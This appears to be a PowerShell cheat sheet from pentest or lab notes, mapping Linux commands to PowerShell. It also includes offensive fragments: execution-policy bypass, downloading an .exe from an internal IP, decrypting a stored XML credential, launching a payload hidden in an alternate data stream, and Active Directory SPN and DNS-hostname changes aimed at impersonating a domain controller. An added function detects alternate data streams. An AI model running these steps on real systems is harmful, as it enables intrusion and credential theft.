PowerShell

Last modified: 2023-03-05

Windows

PowerShell is a task automation and configuration management program from Microsoft. Windows PowerShell uses the Unicode UTF-16LE encoding by default when it writes files.

Start PowerShell

On Linux

pwsh

# Execute PS commands without entering the shell.
pwsh -Command <cmdlet>

On Windows

powershell

# Bypass ExecutionPolicy
powershell -ep bypass
# Check the current policy.
PS> Get-ExecutionPolicy

Commands

OS Information

$PSVersionTable

Change Directory

'cd' in Linux.

Set-Location -Path c:\Users\Administrator\Desktop

List Files

'ls' in Linux.

Get-ChildItem -File -Hidden
Get-ChildItem -File -Hidden -ErrorAction SilentlyContinue

Get-ChildItem -Directory -Hidden
Get-ChildItem -Directory -Hidden -Recurse -Filter '*secret*' -ErrorAction SilentlyContinue

Get-ChildItem -Path .\Desktop
Get-ChildItem -Recurse

View the Content of Files

'cat' in Linux.

Get-Content -Path example.txt
# 'cat | wc -l' in Linux (count lines; use -Word for 'wc -w')
Get-Content -Path example.txt | Measure-Object -Line
# Print a single line by zero-based index (line 319 here), 'sed -n 319p' in Linux
(Get-Content -Path example.txt)[318]

Find Files

'find' in Linux.

Get-ChildItem -Path C:\ -Filter "*.txt" -Recurse 2>$null

Set Content to a File

'echo hello > example.txt' in Linux.

Set-Content -Path .\example.txt -Value hello

Download Web Content

'wget' in Linux.

Invoke-WebRequest -Uri http://10.0.0.1:8000/example.exe -OutFile .\example.exe

Copy Files

'cp' in Linux.

Copy-Item -Path C:\Tools\example.exe -Destination C:\Users\michael\Documents\

Cryptography

# md5sum in Linux
Get-FileHash -Algorithm MD5 example.exe
CertUtil -hashfile example.exe MD5

# sha256sum in Linux
Get-FileHash -Algorithm SHA256 example.exe
CertUtil -hashfile example.exe SHA256

# sha512sum in Linux
Get-FileHash -Algorithm SHA512 example.exe
CertUtil -hashfile example.exe SHA512

XML Credential

We can decrypt a password stored in an XML file written by Export-Clixml. The password is a DPAPI-protected SecureString, so it only decrypts for the same user on the same machine that exported it.

# Decrypt a password in xml.
$Credential = Import-Clixml -Path .\example.xml
$Credential.GetNetworkCredential().password

Strings

'strings' in Linux.

.\Strings.exe -accepteula example.exe

Add New User

'useradd' in Linux.

New-LocalUser -Name "username" -Description "My first account" -NoPassword

# with password
$Password = Read-Host -AsSecureString
New-LocalUser -Name "username" -Password $Password -FullName "New User" -Description "My first account"

Show the Manual of Command

'man' or '--help' in Linux.

Get-Help Get-ChildItem
Get-Help Invoke-WebRequest

Create New File

'touch' in Linux.

New-Item example.txt
$null > example.txt

Create New Folder

'mkdir' in Linux.

mkdir example_folder

Remove Files

'rm' in Linux.

rm example.txt
rm -r example_folder

Reboot Computer

'reboot' in Linux.

Restart-Computer

NTFS (New Technology File System) ADS (Alternate Data Streams)

NTFS ADS lets a malware author hide data inside an otherwise ordinary file on an endpoint. List every stream of a file to reveal them.

Get-Item -Path file.exe -Stream *

To launch an executable hidden in an ADS, run the following command.

wmic process call create $(Resolve-Path example.exe:streamname)
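Defender-side companion to the stream listing above, added here as an example and not part of the original notes: it walks a directory tree on Windows NTFS and reports every file that carries a named stream besides the default :$DATA stream. Zone.Identifier (the mark-of-the-web that browsers write) is skipped unless asked for; the function name and the Head column are my own choices.

```powershell
# Added example: enumerate alternate data streams under a path (Windows NTFS assumed).
function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [switch] $IncludeZoneIdentifier   # Zone.Identifier is expected on downloads
    )
    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * lists every stream, including the unnamed :$DATA main stream.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Where-Object { $IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier' } |
                ForEach-Object {
                    # Peek at the first characters: an embedded PE begins with 'MZ'.
                    $first = Get-Content -LiteralPath $file.FullName -Stream $_.Stream `
                                 -TotalCount 1 -ErrorAction SilentlyContinue
                    $head = if ($first) { $first.Substring(0, [Math]::Min(2, $first.Length)) } else { '' }
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Length = $_.Length
                        Head   = $head
                    }
                }
        }
}

# Usage (constructed example): review a user's profile and show everything, including MOTW.
# Find-AlternateDataStream -Path $env:USERPROFILE -IncludeZoneIdentifier | Format-Table -AutoSize
```

Any stream whose Head reads MZ, or whose Length is large on a file that should be plain data, is worth pulling with Get-Content -Stream for a closer look.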

Active Directory

# List all domain objects in AD
Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com

# List all domain controllers in AD
Get-DomainController

# Get a computer object (PowerView) with its msDS-AllowedToActOnBehalfOfOtherIdentity attribute
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

# Get a domain-joined computer with its DNS hostname and SPNs
Get-ADComputer <PC-NAME> -properties dnshostname,serviceprincipalname

# Remove the current SPN attribute
Set-ADComputer <PC-NAME> -ServicePrincipalName @{}

# Set new DNS hostname to that of the DC
Set-ADComputer <PC-NAME> -DnsHostName VULNDC.vuln.local